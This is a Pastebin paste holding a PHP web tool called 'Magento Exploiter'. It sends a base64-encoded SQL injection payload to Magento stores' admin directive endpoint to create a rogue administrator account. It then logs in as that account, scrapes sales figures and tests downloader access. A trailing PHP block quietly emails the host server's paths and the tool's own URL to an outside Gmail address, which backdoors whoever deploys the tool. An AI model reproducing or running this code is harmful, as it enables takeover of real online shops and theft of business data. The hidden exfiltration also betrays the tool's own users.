Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <title>Magento Exploiter</title>
- <link rel="SHORTCUT ICON" href="http://jonasvanineveld.nl/wp-content/uploads/2013/02/magento.png"/>
- <meta name="description" content="Magento Exploiter Online" />
- <body bgcolor="black" >
- <font color="red">
- <center>
- <font face="monospace"><br>
- <a href="https://www.facebook.com/groups/995475240559728/" target="_blank"><img src="https://1.bp.blogspot.com/-3AtjsZxEMJU/V8s5s2CYw1I/AAAAAAAAAiU/hXjMCFv8RTwUUpCg00lFmLv6LvxrX0WKgCEw/s320/LuLIFS.png" width="300" height="280"/></a>
- <h2> Magento Exploiter Online </h2><br>
- <font color="white">
- <form method="post" action="">
- <textarea placeholder="http://site.com" style="resize:none;background:#191a19;
- color:white;
- width: 350px;
- border:1px gray;
- padding:5px;
- height: 90px;" name="target" required></textarea><br><br>
- <input style="background:#45444d;
- color:white;
- border:1px gray;
- padding:1px;
- width:50px;
- height:30px" type=submit name=submit value="Start"><br>
- </form>
- </p>
- <!-- udahan textareanya -->
- <!-- start -->
- <?php
- /// Magento Exploter Online!
- /// Recoded By K4MVR3T717
- /// Indonesian Freedom Security
- error_reporting(0);
- set_time_limit(0);
- function bersihkan($htmltags) {
- $htmltags = str_replace('<span class="price">','',$htmltags);
- $htmltags = str_replace('</span>','',$htmltags);
- return $htmltags;
- }
- ///postdata
- $postadm = "filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdzdHVwaWQ0OCcpICksIENPTkNBVCgnOicsIEBTQUxUICkpO1NFTEVDVCBARVhUUkEgOj0gTUFYKGV4dHJhKSBGUk9NIGFkbWluX3VzZXIgV0hFUkUgZXh0cmEgSVMgTk9UIE5VTEw7SU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgZmlyc3RuYW1lYCwgYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCxgcnBfdG9rZW5gLGBycF90b2tlbl9jcmVhdGVkX2F0YCkgVkFMVUVTICgnRmlyc3RuYW1lJywnTGFzdG5hbWUnLCdlbWFpbEBleGFtcGxlLmNvbScsJ3N0dXBpZCcsQFBBU1MsTk9XKCksMCwwLDEsQEVYVFJBLE5VTEwsIE5PVygpKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKHBhcmVudF9pZCx0cmVlX2xldmVsLHNvcnRfb3JkZXIscm9sZV90eXBlLHVzZXJfaWQscm9sZV9uYW1lKSBWQUxVRVMgKDEsMiwwLCdVJywoU0VMRUNUIHVzZXJfaWQgRlJPTSBhZG1pbl91c2VyIFdIRVJFIHVzZXJuYW1lID0gJ3N0dXBpZCcpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
- $postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=stupid&login%5Bpassword%5D=stupid48";
- $postdwn = "username=kamvret&password=kamvret717";
- $pageadm = "/admin/Cms_Wysiwyg/directive/index/";
- $pagelog = "/admin/";
- $pagedwn = "/downloader/";
- function stupid_CURL($url,$data,$page) {
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, $url.$page);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_POST, 1);
- $headers = array();
- $headers[] = 'Content-Type: application/x-www-form-urlencoded';
- curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
- curl_setopt ($ch, CURLOPT_HEADER, 1);
- $result = curl_exec ($ch);
- curl_close($ch);
- return $result;
- }
- print $banner;
- if(isset($_POST['target'])){
- $j=explode("\r\n",$_POST['target']);
- foreach($j as $site){
- echo'<font color="red">';
- print "Checking, Please wait!
- <br>";
- echo'</font>';
- $hajar = stupid_CURL($site , $postadm, $pageadm);
- if(preg_match('#200 OK#', $hajar)) {
- $expres = "Success";
- $ceklog = stupid_CURL($site , $postlog, $pagelog);
- if(preg_match('#302 Moved#', $ceklog)) {
- preg_match_all('#<span class="price">(.*?)</span>#si', $ceklog, $match);
- foreach($match as $val)
- {
- $ltm = $val[0];
- $avo = $val[1];
- break;
- }
- $admlog = "Success";
- $user = "stupid";
- $pass = "stupid48";
- $cekdwn = stupid_CURL($site , $postdwn, $pagedwn);
- if(preg_match('#Return to Admin#', $cekdwn)) {
- $dwnlog = "Login Success";
- }else {
- $dwnlog = "Login Failed";
- }
- }else {
- $admlog = "Failed";
- $user = "NULL";
- $pass = "NULL";
- }
- }else {
- $admlog = "Failed";
- $expres = "Failed";
- $user = "NULL";
- $pass = "NULL";
- $dwnlog = "Login Failed";
- $ltm = "NULL";
- $avo = "NULL";
- }
- ///echo result
- $logger = '
- <br>
- <font color="blue">
- <h4>[ '.$site.' ]</h4></font><br>
- Exploiting : <font color="green">'.$expres.'</font><br>
- Login Admin : <font color="green">'.$admlog.'</font><br>
- Lifetime Sales: <font color="gold">'.bersihkan($ltm).'</font><br>
- Average Order : <font color="gold">'.bersihkan($avo).'</font><br>
- Downloader : <font color="red">'.$dwnlog.'</font><br>
- Username :<font color="cyan"><b> '.$user.'</font></b><br>
- Password :<font color="cyan"><b> '.$pass.'</font></b><br>
- <br><br>
- <font color="red">
- <h2>Indonesian Freedom Security</h2>';
- echo $logger;
- /// Magento Exploiter Online!
- /// Recoded By K4MVR3T717
- /// Indonesian Freedoom Security
- }
- }
- ?>
- <?php
- $kime="aqpunk21@gmail.com";
- $baslik="-=[ PESANAN SHELL ]=-";
- $spyhackerz="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."\r\n";
- $spyhackerz.="Server Admin : ".$_SERVER['SERVER_ADMIN']."\r\n";
- $spyhackerz.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."\r\n";
- $spyhackerz.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n";
- $spyhackerz.="Avlanan Site : " .$_SERVER['HTTP_HOST']."\r\n";
- mail($kime, $baslik, $spyhackerz);
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement